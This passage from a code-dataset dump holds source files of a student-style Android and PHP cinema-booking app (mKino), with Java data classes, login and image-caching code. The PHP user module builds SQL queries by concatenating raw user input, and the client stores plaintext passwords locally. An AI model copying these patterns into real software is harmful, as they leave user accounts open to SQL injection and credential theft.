zemljopisnaDuzina;\r\n\t\tthis.zemljopisnaSirina = zemljopisnaSirina;\r\n\t}\r\n\t\r\n\tpublic int getIdMultipleksa() {\r\n\t\treturn idMultipleksa;\r\n\t}\r\n\tpublic String getNaziv() {\r\n\t\treturn naziv;\r\n\t}\r\n\tpublic String getOznaka() {\r\n\t\treturn oznaka;\r\n\t}\r\n\tpublic float getZemljopisnaDuzina() {\r\n\t\treturn zemljopisnaDuzina;\r\n\t}\r\n\tpublic float getZemljopisnaSirina() {\r\n\t\treturn zemljopisnaSirina;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.678856372833252, "alphanum_fraction": 0.678856372833252, "avg_line_length": 17.789474487304688, "blob_id": "cdc5d6a9ce5b46bf95afc1116e38f93e30378916", "content_id": "933cccc232d5cc457a6adeb471da6a682c1cba10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 122, "num_lines": 76, "path": "/client-side/src/hr/air/mkino/tipovi/ProjekcijaInfo.java", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "package hr.air.mkino.tipovi;\r\n/**\r\n * Klasa koja predstavlja slozeni tip podataka o projekcijama.\r\n * @author bstivic\r\n *\r\n */\r\npublic class ProjekcijaInfo {\r\n\tprivate int idProjekcije;\r\n\tprivate int dvorana;\r\n\tprivate FilmInfo film;\r\n\tprivate String vrijemePocetka;\r\n\tprivate int multipleks;\r\n\tprivate float cijena;\r\n\t\r\n\tpublic ProjekcijaInfo(int idProjekcije, int dvorana, FilmInfo film, String vrijemePocetka, int multipleks, float cijena){\r\n\t\tthis.idProjekcije = idProjekcije;\r\n\t\tthis.dvorana = dvorana;\r\n\t\tthis.film = film;\r\n\t\tthis.vrijemePocetka = vrijemePocetka;\r\n\t\tthis.multipleks = multipleks;\r\n\t\tthis.cijena = cijena;\r\n\t}\r\n\t\r\n\tpublic float getCijena(){\r\n\t\treturn cijena;\r\n\t}\r\n\tpublic int getidProjekcije(){\r\n\t\treturn idProjekcije;\r\n\t}\r\n\tpublic int getDvorana(){\r\n\t\treturn dvorana;\r\n\t}\r\n\tpublic String getVrijemePocetka()\r\n\t{\r\n\t\treturn vrijemePocetka;\r\n\t}\r\n\tpublic int getMultipleks(){\r\n\t\treturn multipleks;\r\n\t}\r\n\t\r\n\tpublic int getIdFilma() {\r\n\t\treturn film.getIdFilma();\r\n\t}\r\n\r\n\tpublic String getNaziv() {\r\n\t\treturn film.getNaziv();\r\n\t}\r\n\r\n\tpublic String getOpis() {\r\n\t\treturn film.getOpis();\r\n\t}\r\n\r\n\tpublic String getRedatelj() {\r\n\t\treturn film.getRedatelj();\r\n\t}\r\n\r\n\tpublic String getGlavneUloge() {\r\n\t\treturn film.getGlavneUloge();\r\n\t}\r\n\r\n\tpublic int getTrajanje() {\r\n\t\treturn film.getTrajanje();\r\n\t}\r\n\r\n\tpublic int getGodina() {\r\n\t\treturn film.getGodina();\r\n\t}\r\n\r\n\tpublic String getZanr() {\r\n\t\treturn film.getZanr();\r\n\t}\r\n\r\n\tpublic int getAktualno() {\r\n\t\treturn film.getAktualno();\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.6274632215499878, "alphanum_fraction": 0.6365342736244202, "avg_line_length": 40.6533317565918, "blob_id": "aec7307c051754666adab1c883143d29455b4a1b", "content_id": "4896a99c30e08f976f3b710045f688dba27607fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3208, "license_type": "no_license", "max_line_length": 231, "num_lines": 75, "path": "/server-side/Datoteke/skripte/korisnici.php", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "<?php\r\n\tclass Korisnici\r\n\t{\r\n\t\tpublic static function PrijaviSe($korisnickoIme, $lozinka)\r\n\t\t{\r\n\t\t\trequire_once 'DB_connect.php';\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE korisnickoIme = '$korisnickoIme'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['povratnaInformacijaId']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 2, 'povratnaInformacijaTekst' => utf8_encode('Nepostojeći korisnik')));\r\n\t\t\t} else\r\n\t\t\t{\r\n\t\t\t\t$lozinkaHash = hash('sha512', $lozinka . $korisnik[0]['salt']);\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t$upit = \"SELECT idKorisnika, korisnickoIme, ime, prezime, email, telefon FROM korisnici WHERE korisnickoIme = '$korisnickoIme' AND lozinka = '$lozinkaHash'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['povratnaInformacijaId']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 3, 'povratnaInformacijaTekst' => utf8_encode('Pogrešna lozinka')));\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn $korisnik;\r\n\t\t}\r\n\t\t\r\n\t\tpublic static function RegistrirajSe($podaci)\r\n\t\t{\r\n\t\t\trequire_once 'DB_connect.php';\r\n\t\t\t// provjeravamo postoji li korisničko ime već u bazi\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE korisnickoIme = '\" . $podaci['korisnickoIme'] . \"'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['korisnickoIme']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 4, 'povratnaInformacijaTekst' => utf8_encode('Korisnik već postoji'))); \r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t// provjeravamo postoji li email već u bazi\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE email = '\" . $podaci['email'] . \"'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['email']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 5, 'povratnaInformacijaTekst' => utf8_encode('Email adresa već postoji'))); \r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t// provjeravamo postoji li telefon već u bazi\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE telefon = '\" . $podaci['telefon'] . \"'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['telefon']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 6, 'povratnaInformacijaTekst' => utf8_encode('Taj telefonski broj već postoji'))); \r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t// ako se nije dogodio nikakav konflikt, dodajemo korisnika u bazu\r\n\t\t\t$upit = \"INSERT INTO korisnici VALUES (DEFAULT, '\".$podaci['korisnickoIme'].\"', '\".$podaci['lozinka'].\"', '\".$podaci['salt'].\"', '\".$podaci['ime'].\"', '\".$podaci['prezime'].\"', '\".$podaci['email'].\"', '\".$podaci['telefon'].\"')\";\r\n\t\t\t$uspjeh = Upit($upit);\r\n\t\t\t\r\n\t\t\tif ($uspjeh)\r\n\t\t\t{\r\n\t\t\t\t// pronalazimo id trenutno unesenog korisnika\r\n\t\t\t\t$upit2 = \"SELECT idKorisnika from korisnici WHERE korisnickoIme = '\" . $podaci['korisnickoIme'] . \"'\";\r\n\t\t\t\t$id = UpitUBazu($upit2);\r\n\t\t\t\t\r\n\t\t\t\t// unosimo jednu praznu rezervaciju\r\n\t\t\t\t$idk = $id[0]['idKorisnika'];\r\n\t\t\t\t$upit3 = \"INSERT INTO rezervacije (projekcija, korisnik, brojSjedala, kod) VALUES ($idk, $idk, $idk, '$idk-0')\";\r\n\t\t\t\tUpit($upit3);\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 0, 'povratnaInformacijaTekst' => utf8_encode('Korisnik uspješno dodan'))); \r\n\t\t\t} else\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 7, 'povratnaInformacijaTekst' => utf8_encode('Korisnika nije bilo moguće dodati u bazu. Razlog nepoznat'))); \r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n?>" }, { "alpha_fraction": 0.6949654221534729, "alphanum_fraction": 0.6957058310508728, "avg_line_length": 33.85840606689453, "blob_id": "ca7b1579edf2af32971bb5a680face7ab75c167f", "content_id": "2aa197343f48ddf0b5c49ac62eaa9a3bdbfbb3c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4063, "license_type": "no_license", "max_line_length": 118, "num_lines": 113, "path": "/client-side/src/hr/air/mkino/core/Prijava.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.core;\r\n\r\nimport android.app.Dialog;\r\nimport android.content.Context;\r\nimport android.view.View;\r\nimport android.view.Window;\r\nimport android.view.View.OnClickListener;\r\nimport android.widget.Button;\r\nimport android.widget.EditText;\r\nimport android.widget.Toast;\r\nimport hr.air.mkino.R;\r\nimport hr.air.mkino.baza.PrijavljeniKorisnikAdapter;\r\nimport hr.air.mkino.server.JsonPrijava;\r\nimport hr.air.mkino.tipovi.Korisnik;\r\n\r\n/**klasa poslovne logike koja služi za prikaz dijaloga prijave i izvršavanje prijave*/\r\npublic class Prijava {\r\n\t\r\n\t/**\r\n\t * Metoda koja prikazuje dijalog za prijavu u aplikaciju\r\n\t * @param aktivni Context\r\n\t * */\r\n\tpublic void prikaziDijalog(final Context context) {\r\n\t\t\tfinal Dialog dialogPrijava = new Dialog(context);\r\n\t\t\tdialogPrijava.requestWindowFeature(Window.FEATURE_NO_TITLE);\r\n\t\t\tdialogPrijava.setContentView(R.layout.dialog_prijava);\t\t\t\r\n\t\t\tdialogPrijava.show();\r\n\t\t\t\r\n\t\t\t/*dohvaćanje unešenih podataka*/\t\t\t\r\n\t\t\tButton btnPrijaviSe = (Button)dialogPrijava.findViewById(R.id.dialog_prijava_btnPrijaviSe);\r\n\t\t\tButton btnOdustani = (Button) dialogPrijava.findViewById(R.id.dijalog_prijava_btnOdustani);\r\n\t\t\tButton btnRegistracija = (Button)dialogPrijava.findViewById(R.id.prijava_btnRegistrirajSe);\r\n\t\t\t\r\n\t\t\tfinal EditText txtKorisnickoIme = (EditText) dialogPrijava.findViewById(R.id.dialog_registracija_txtKorisnickoIme);\r\n\t\t\tfinal EditText txLozinka = (EditText)dialogPrijava.findViewById(R.id.dialog_registracija_txtLozinka);\r\n\t\t\t\r\n\t\t\t/*odustani od prijave*/\r\n\t\t\tbtnOdustani.setOnClickListener(new OnClickListener() {\r\n\t\t\t\t\t@Override\r\n\t\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\t\tdialogPrijava.dismiss();\r\n\r\n\t\t\t\t\t}\r\n\t\t\t\t});\r\n\t\t\t\t\t\r\n\t\t\t/*klik na prijavu*/\r\n\t\t\tbtnPrijaviSe.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\t\t\t\t\r\n\t\t\t\t\tString tKorisnickoIme= txtKorisnickoIme.getText().toString();\r\n\t\t\t\t\tString tLozinka = txLozinka.getText().toString();\r\n\t\t\t\t\t\r\n\t\t\t\t\t/*validacija na klijentskoj strani*/\r\n\t\t\t\t\tif(tKorisnickoIme == null || tKorisnickoIme.length() ==0)\r\n\t\t\t\t\t\tToast.makeText(context, \"Unesite korisničko ime\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\r\n\t\t\t\t\telse if(tLozinka == null || tLozinka.length() ==0)\r\n\t\t\t\t\t\tToast.makeText(context, \"Unesite lozinku\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\r\n\t\t\t\t\telse{\r\n\t\t\t\t\t\tJsonPrijava novaPrijava = new JsonPrijava();\r\n\t\t\t\t\t\t/*instanciranje objekta Korisnik koji ce sluziti za prijavu*/\r\n\t\t\t\t\t\tKorisnik prijava = novaPrijava.prijavi(tKorisnickoIme, tLozinka);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t/*uspješna prijava*/\r\n\t\t\t\t\t\tif(prijava != null)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tToast.makeText(context, \"Uspješno ste prijavljeni!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\t\tPrijavljeniKorisnikAdapter prijavljeniKorisnikAdapter = new PrijavljeniKorisnikAdapter(context);\r\n\t\t\t\t\t\t\tif(prijavljeniKorisnikAdapter.pohraniKorisnickePodatke(tKorisnickoIme, tLozinka) > \t0)\r\n\t\t\t\t\t\t\t\tToast.makeText(context, \"zapamtio u bazu\", Toast.LENGTH_SHORT);\r\n\t\t\t\t\t\t\tdialogPrijava.dismiss();\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t/*neuspješna prijava*/\r\n\t\t\t\t\t\t\tToast.makeText(context, \"Neuspješna prijava!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t\t\r\n\t\t\t/*klik na registraciju koji otvara dijalog za registraciju korisnika*/\r\n\t\t\tbtnRegistracija.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\t/*zatvaramo dijalog za prijavu*/\r\n\t\t\t\t\tdialogPrijava.dismiss();\r\n\t\t\t\t\t\r\n\t\t\t\t\t/*prikazujemo dijalog za registraciju*/\r\n\t\t\t\t\tRegistracija registracije = new Registracija();\r\n\t\t\t\t\tregistracije.prikaziDijalog(context);\t\t\t\t\t\r\n\t\t\t\t}\t\t\t\t\r\n\t\t\t});\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\r\n\t/**\r\n\t * Metoda koja odjavljuje korisnika iz aplikacije\r\n\t * @param trenutni Context\r\n\t * */\r\n\tpublic void odjava(Context context)\r\n\t{\r\n\t\tPrijavljeniKorisnikAdapter prijavljeniKorisnik = new PrijavljeniKorisnikAdapter(context);\r\n\t\t/*brišemo prijavljenog korisnika iz lokalne baze podataka*/\r\n\t\tprijavljeniKorisnik.obrisiPrijavljenogKorisnika();\r\n\t\tToast.makeText(context, \"Uspješno ste se odjavili\", Toast.LENGTH_SHORT).show();\r\n\t}\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.6925264000892639, "alphanum_fraction": 0.6949634552001953, "avg_line_length": 26.79532241821289, "blob_id": "3dddd9fc5e3022338a5f6bf2c8d790f93adabafe", "content_id": "35394b063b1dee6e5e67417572c75f9de34f0959", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4941, "license_type": "no_license", "max_line_length": 146, "num_lines": 171, "path": "/client-side/src/hr/air/mkino/server/SlikaSaServera.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\n\r\nimport java.io.File;\r\nimport java.io.FileNotFoundException;\r\nimport java.io.FileOutputStream;\r\nimport java.io.IOException;\r\nimport java.io.InputStream;\r\nimport java.net.HttpURLConnection;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport android.content.Context;\r\nimport android.graphics.Bitmap;\r\nimport android.graphics.BitmapFactory;\r\nimport android.os.AsyncTask;\r\nimport android.os.Environment;\r\nimport android.util.DisplayMetrics;\r\n\r\n/**\r\n * Služi za dohvaćanje slike filma sa servera.\r\n * U konstruktoru prima identifikacijsku oznaku filma, koju onda poslije koristi u metodama za dohvat slike.\r\n * @author domagoj\r\n *\r\n */\r\npublic class SlikaSaServera extends AsyncTask<String, Void, Bitmap> implements ISlikaFilma {\r\n\tprivate Context context;\r\n\tprivate int idFilma;\r\n\t\r\n\tpublic SlikaSaServera(Context context, int idFilma) {\r\n\t\tthis.context = context;\r\n\t\tthis.idFilma = idFilma;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća sliku filma u velikom formatu\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiVelikuSliku()\r\n\t{\r\n\t\tString url = \"http://mkinoairprojekt.me.pn/skripte/index.php?tip=slike&id=\" + idFilma;\r\n\t\tthis.execute(url);\r\n\t\tBitmap slika = null;\r\n\t\ttry {\r\n\t\t\tslika = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\tpohraniSlikuNaSD(slika, true);\r\n\t\treturn slika;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća sliku filma u malom formatu\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiMaluSliku()\r\n\t{\r\n\t\tString url = \"http://mkinoairprojekt.me.pn/skripte/index.php?tip=slikemale&id=\" + idFilma;\r\n\t\tthis.execute(url);\r\n\t\tBitmap slika = null;\r\n\t\ttry {\r\n\t\t\tslika = promijeniVelicinuMaleSlike(this.get());\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\tpohraniSlikuNaSD(slika, false);\r\n\t\treturn slika;\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * Nakon što se slika preuzme s interneta, potrebno ju je pohraniti na SD karticu u svrhu cachiranja\r\n\t * @param slika koju treba pohraniti\r\n\t * @param velikaSlika radi li se o velikoj slici ili maloj (sa ListView-a)\r\n\t */\r\n\tprivate void pohraniSlikuNaSD(Bitmap slika, boolean velikaSlika) {\r\n\t\tString putanjaDoSlike;\r\n\t\tString sdKartica = Environment.getExternalStorageDirectory().getPath();\r\n\t\t\r\n\t\tif (velikaSlika)\r\n\t\t{\r\n\t\t\tputanjaDoSlike = sdKartica + \"/mKino/\" + idFilma + \".jpg\";\r\n\t\t} else\r\n\t\t{\r\n\t\t\tputanjaDoSlike = sdKartica + \"/mKino/\" + idFilma + \"_mala.jpg\";\r\n\t\t}\r\n\t\t\r\n\t\t// najprije napravimo direktorij \"mKino\" na SD kartici (ukoliko taj direktorij ne postoji)\r\n\t\tFile direktorij = new File(sdKartica + \"/mkino\");\r\n\t\tif (!direktorij.exists())\r\n\t\t{\r\n\t\t\tdirektorij.mkdir();\r\n\t\t}\r\n\t\t\r\n\t\t// nakon što znamo da direktorij \"mKino\" postoji na SD kartici, čuvamo podatke na njoj\r\n\t\ttry {\r\n\t\t\tFileOutputStream tok = new FileOutputStream(putanjaDoSlike);\r\n\t\t\tslika.compress(Bitmap.CompressFormat.JPEG, 90, tok);\r\n\t\t\ttok.close();\r\n\t\t} catch (FileNotFoundException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (IOException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t}\r\n\r\n\t/**\r\n\t * Ova metoda mijenja veličinu malih slika. Veličinu preuzetih slika je potrebno promijeniti kako bi prikazane slike zauzimale što manje memorije\r\n\t * @param velika slika\r\n\t * @return mala slika ili originalna ukoliko nije potrebno mijenjati veličinu\r\n\t */\r\n\tprivate Bitmap promijeniVelicinuMaleSlike(Bitmap slika) {\r\n\t\tint sirinaVisina = 0;\r\n\t\t\r\n\t\t// provjeravamo je li razlučivost xhdpi, hdpi, mdpi ili ldpi\r\n\t\tswitch(context.getResources().getDisplayMetrics().densityDpi)\r\n\t\t{\r\n\t\t\tcase DisplayMetrics.DENSITY_LOW:\r\n\t\t\t\tsirinaVisina = 60; break;\r\n\t\t\tcase DisplayMetrics.DENSITY_MEDIUM:\r\n\t\t\t\tsirinaVisina = 80; break;\r\n\t\t\tcase DisplayMetrics.DENSITY_HIGH:\r\n\t\t\t\tsirinaVisina = 120; break;\r\n\t\t}\r\n\t\t\r\n\t\t// ako se širina(visina) slike nije promijenila, a to je u slučaju kada je telefon xhdpi ili xxhdpi, tada ju nećemo ni resize-ati,\r\n\t\t// nego ćemo vratiti staru vrijednost slike (else). U suprotnom ćemo vratiti resize-anu vrijednost\r\n\t\tif (sirinaVisina != 0)\r\n\t\t{\r\n\t\t\tBitmap novaSlika = Bitmap.createScaledBitmap(slika, sirinaVisina, sirinaVisina, false);\r\n\t\t\treturn novaSlika;\r\n\t\t} else\r\n\t\t{\r\n\t\t\treturn slika;\r\n\t\t}\r\n\t}\r\n\r\n\t@Override\r\n\tprotected Bitmap doInBackground(String... parametri) {\r\n\t\tString urlString = parametri[0];\r\n\t\tURL url;\r\n\t\tHttpURLConnection veza;\r\n\t\tBitmap slika = null;\r\n\t\t\r\n\t\ttry {\r\n\t\t\turl = new URL(urlString);\r\n\t\t\tveza = (HttpURLConnection) url.openConnection();\r\n\t\t\tveza.setDoInput(true);\r\n\t\t\tveza.connect();\r\n\t\t\tInputStream tok = veza.getInputStream();\r\n\t\t\tslika = BitmapFactory.decodeStream(tok);\r\n\t\t\tveza.disconnect();\r\n\t\t} catch (MalformedURLException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (IOException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn slika;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7036688327789307, "alphanum_fraction": 0.7036688327789307, "avg_line_length": 25.973684310913086, "blob_id": "cfc7a86f0a99fd5b110d0d3fbf0b94f54ad50fa9", "content_id": "4751ee4b797152d38b5ac143a070e507e22a432c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 131, "num_lines": 38, "path": "/client-side/src/hr/air/mkino/sd/LokalnaSlika.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.sd;\r\n\r\nimport android.graphics.Bitmap;\r\nimport android.graphics.BitmapFactory;\r\nimport android.os.Environment;\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\n\r\n/**\r\n * Služi za dohvaćanje slike filma sa SD kartice.\r\n * Za konstruktor prima ID filma kojeg dalje koristi u metodama.\r\n * @author domagoj\r\n *\r\n */\r\npublic class LokalnaSlika implements ISlikaFilma {\r\n\tint idFilma;\r\n\t\r\n\tpublic LokalnaSlika(int idFilma) {\r\n\t\tthis.idFilma = idFilma;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća sliku filma u velikom formatu.\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiVelikuSliku() {\r\n\t\tBitmap slika = BitmapFactory.decodeFile(Environment.getExternalStorageDirectory().getPath() + \"/mKino/\" + idFilma + \".jpg\");\r\n\t\treturn slika;\r\n\t}\r\n\r\n\t/**\r\n\t * Dohvaća sliku filma u malom formatu (najčešće za prikaz u ListView-u).\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiMaluSliku() {\r\n\t\tBitmap slika = BitmapFactory.decodeFile(Environment.getExternalStorageDirectory().getPath() + \"/mKino/\" + idFilma + \"_mala.jpg\");\r\n\t\treturn slika;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.7088446617126465, "alphanum_fraction": 0.7140541672706604, "avg_line_length": 36.05286407470703, "blob_id": "941c72857991b02d2d09980fa0e482547a7bc021", "content_id": "24ce0c5a9a45a1cdcd75d3615c7d1cb1c528e6f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8668, "license_type": "no_license", "max_line_length": 130, "num_lines": 227, "path": "/client-side/src/hr/air/mkino/ProjekcijeActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\nimport hr.air.mkino.core.Rezervacija;\r\nimport hr.air.mkino.listviewadapteri.StavkaProjekcije;\r\nimport hr.air.mkino.server.JsonFilmovi;\r\nimport hr.air.mkino.server.JsonProjekcije;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\nimport java.text.SimpleDateFormat;\r\nimport java.util.ArrayList;\r\nimport java.util.Date;\r\nimport java.util.List;\r\nimport android.app.Activity;\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\nimport android.view.View;\r\nimport android.widget.AdapterView;\r\nimport android.widget.AdapterView.OnItemSelectedListener;\r\nimport android.widget.ArrayAdapter;\r\nimport android.widget.ListView;\r\nimport android.widget.Spinner;\r\nimport android.widget.TextView;\r\nimport android.widget.AdapterView.OnItemClickListener;\r\n\r\n/**Klasa koja služi za prikaz projekcija.\r\n * \r\n * @author bstivic\r\n */\r\npublic class ProjekcijeActivity extends Activity {\r\n\tprivate Spinner odabirGrada;\r\n\tprivate Spinner odabirDatuma;\r\n\tprivate ListView popisProjekcija;\r\n\tprivate List<ProjekcijaInfo> projekcije;\r\n\t\r\n\t\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\t\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_projekcije);\r\n\t\tsetTitle(\"Popis projekcija\");\r\n\t\t\r\n\t\t// inicijaliziramo klasne varijable\r\n\t\todabirGrada = (Spinner) findViewById(R.id.rezervacije_spinner_grad);\r\n\t\todabirDatuma = (Spinner) findViewById(R.id.rezervacije_spiner_datum);\r\n\t\tpopisProjekcija= (ListView) findViewById(R.id.rezervacije_popis_projekcija);\r\n\t\r\n\t\tint odabraniMultipleks = dohvatiOdabraniMultipleks();\r\n\r\n\t\t// postavljamo spinner na trenutno odabrani multipleks\r\n\t\todabirGrada.setSelection(odabraniMultipleks-1);\r\n\t\t\r\n\t\t// dohvaćamo aktualne filmove s web servisa, i pritom punimo/modificiramo lokalnu bazu filmova iz koje će se kasnije vući podaci\r\n\t\tJsonFilmovi jf = new JsonFilmovi();\r\n\t\tjf.dohvatiFilmove(this);\r\n\t\t\r\n\t\t//postavljamo spinner na današnji datum i popunjavamo ga sa datumima u iduća dva tjedna\r\n\t\tArrayList<String> dani = new ArrayList<String>();\r\n\t\t\r\n\t\t Date sadasnjiDatum = new Date();\r\n\t\t SimpleDateFormat formatDatuma = new SimpleDateFormat(\"dd.MM.yyyy\");\r\n\r\n\t\t //Zapisujemo 14 slijedećih kalendarskih dana u spinner\r\n\t\t for (int i = 0; i < 14; i++)\r\n\t\t {\t\t\t\r\n\t\t \tdani.add(formatDatuma.format(sadasnjiDatum)+\" \" +vratiDanUTjednu(sadasnjiDatum));\r\n\t\t \tsadasnjiDatum = Rezervacija.dodajDan(sadasnjiDatum, 1);\r\n\t\t }\r\n\t\t ArrayAdapter<String> adapter = new ArrayAdapter<String>(this,\r\n\t\t android.R.layout.simple_spinner_item, dani);\r\n\r\n\t\t \r\n\t\t odabirDatuma.setAdapter(adapter);\r\n\t\t odabirDatuma.setSelection(0);\r\n\t\t \r\n\t\t //računamo koji je datum u spinneru s datumom\r\n\t\t sadasnjiDatum = new Date();\r\n\t\t odabirDatuma.setOnItemSelectedListener(new OnItemSelectedListener() {\r\n\t\t \t@Override\r\n\t\t\t\tpublic void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long indeksDana) {\t\t\t\t\t\t\t\t\t\t\r\n\t\t \t\tDate sadasnjiDatum = new Date();\r\n\t\t \t\t\r\n\t\t \t\tsadasnjiDatum = Rezervacija.dodajDan(sadasnjiDatum,(int)indeksDana);\t\t \t\t\r\n\t\t \t\t SimpleDateFormat formatDatuma2 = new SimpleDateFormat(\"yyyy-MM-dd\");\r\n\t\t \t\t \r\n\t\t \t\t //učitavamo datume u listview\r\n\t\t \t\tucitajProjekcijeUListView(formatDatuma2.format(sadasnjiDatum));\t\t \t\t\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onNothingSelected(AdapterView<?> arg0) {}\t\t \r\n\t\t \r\n\t\t });\r\n\t\t \r\n\t\t //prilikom odabira grada mijenja se prikaz projekcija za odabrani grad\r\n\t\t odabirGrada.setOnItemSelectedListener(new OnItemSelectedListener() {\r\n\t\t \t@Override\r\n\t\t\t\tpublic void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long idOdabranogMultipleksa) {\t\t\t\t\t\t\t\t\t\t\r\n\r\n\t\t \t\t//ponovno zahtjevamo projekcije za odabrani grad\r\n\t\t \t\tprojekcije = dohvatiProjekcije((int)idOdabranogMultipleksa+1);\t\r\n\t\t \t\t\r\n\t\t \t\tDate sadasnjiDatum = new Date();\r\n\t\t \t\tsadasnjiDatum = Rezervacija.dodajDan(sadasnjiDatum,(int)odabirDatuma.getSelectedItemPosition());\r\n\t\t \t\tSimpleDateFormat formatDatuma2 = new SimpleDateFormat(\"yyyy-MM-dd\");\r\n\t\t \t\t//učitavamo datume u listview\r\n\t\t \t\tucitajProjekcijeUListView(formatDatuma2.format(sadasnjiDatum));\r\n\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onNothingSelected(AdapterView<?> arg0) {}\r\n\t\t\t});\r\n\t\t \r\n\t\t// postavljamo listener na ListView s projekcijama\r\n\t\tpopisProjekcija.setOnItemClickListener(new OnItemClickListener() {\r\n\t\t\t@Override\r\n\t\t\tpublic void onItemClick(AdapterView<?> arg0, View kliknutaProjekcija, int pozicijaKliknuteProjekcije, long idKli) {\r\n\t\t\t\tTextView tv = (TextView) kliknutaProjekcija.findViewById(R.id.id_projekcije_u_bazi);\r\n\t\t\t\tint idProjekcijeUBazi = 